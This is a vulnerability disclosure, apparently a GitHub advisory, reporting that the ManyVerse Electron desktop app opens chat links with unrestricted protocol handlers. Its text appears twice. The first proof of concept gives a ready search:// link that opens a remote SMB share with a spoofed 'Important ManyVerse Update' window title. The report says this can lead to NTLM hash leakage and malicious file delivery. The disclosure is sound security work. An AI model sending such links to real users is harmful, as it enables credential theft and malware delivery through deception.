Summary
The ManyVerse desktop application is not protecting against malicious links that use Electrons shell.OpenExternal. This can result in malicious file delivery, NTLM hash exposure and other local actions.
Details
The ManyVerse application is built upon the Electron framework, which provides some great functions for users and developers, however the user input has to be controlled otherwise it can result in user compromise. The application currently provides users with the ability to add links to public/private chats, but it does not restrict the protocol handlers that are allowed. That's not unusual, however Electron doesn't provide some of the same protection mechanism that modern browsers do (even though the technology is based on chromium). When developers provide users with the option to use links, then per the Electron security guideline (https://www.electronjs.org/docs/latest/tutorial/security#15-do-not-use-shellopenexternal-with-untrusted-content) the content has to be restricted, or developers need to implement a list of protocol handlers that are allowed within the application.
If this is not implemented, then that provides attackers with an opportunity to send malicious protocol handler links that will trigger other applications on the machine. Electron does not provide a security warning like modern browsers, so the action will be launched without further user consent (after the link is clicked).
There are many dangerous protocol handlers out there that can trigger malicious actions on the machine, but one of the most recent ones is the native Microsoft search:// (or search-ms://) protocol handler. The protocol handler can be used to have the user connect to a remote attacker controlled SMB share to present files that would usually be blocked by anti-virus. When the user connects, then the local NTLM hash is leaked to the attacker. Even worse, the window title can be spoofed to trick the user into running the malicious file that is presented. When that happens and the user is infected it opens them up to further local actions through infected malicious protocol handlers.
PoC
- Log into the ManyVerse application
- Send a user a message or send a new message to a public channel
- Include the following poc link search://query=PsExec.exe&crumb=location:%5c%5clive.sysinternals.com%5ctools&displayName=Important%20ManyVerse%20Update
- Send it to the user and have them click on it
- Wait approx 20-30 seconds after the click. A spoofed windows file explorer window will open and presents the malicious file. In the POC the user connected to Microsofts remote SMB share, but i've confirmed that the same is possible with impacket's SMB server.
Impact
Malicious file delivery, hash exposure and other local actions if the correct protocol handler is being used. There is a long standing history of different CVE's that were discovered where protocol handler is possible.
itssixtyn3in Reporter
Summary
The ManyVerse desktop application is not protecting against malicious links that use Electrons shell.OpenExternal. This can result in malicious file delivery, NTLM hash exposure and other local actions.
Details
The ManyVerse application is built upon the Electron framework, which provides some great functions for users and developers, however the user input has to be controlled otherwise it can result in user compromise. The application currently provides users with the ability to add links to public/private chats, but it does not restrict the protocol handlers that are allowed. That's not unusual, however Electron doesn't provide some of the same protection mechanism that modern browsers do (even though the technology is based on chromium). When developers provide users with the option to use links, then per the Electron security guideline (https://www.electronjs.org/docs/latest/tutorial/security#15-do-not-use-shellopenexternal-with-untrusted-content) the content has to be restricted, or developers need to implement a list of protocol handlers that are allowed within the application.
If this is not implemented, then that provides attackers with an opportunity to send malicious protocol handler links that will trigger other applications on the machine. Electron does not provide a security warning like modern browsers, so the action will be launched without further user consent (after the link is clicked).
There are many dangerous protocol handlers out there that can trigger malicious actions on the machine, but one of the most recent ones is the native Microsoft search:// (or search-ms://) protocol handler. The protocol handler can be used to have the user connect to a remote attacker controlled SMB share to present files that would usually be blocked by anti-virus. When the user connects, then the local NTLM hash is leaked to the attacker. Even worse, the window title can be spoofed to trick the user into running the malicious file that is presented. When that happens and the user is infected it opens them up to further local actions through infected malicious protocol handlers.
PoC
Impact
Malicious file delivery, hash exposure and other local actions if the correct protocol handler is being used. There is a long standing history of different CVE's that were discovered where protocol handler is possible.
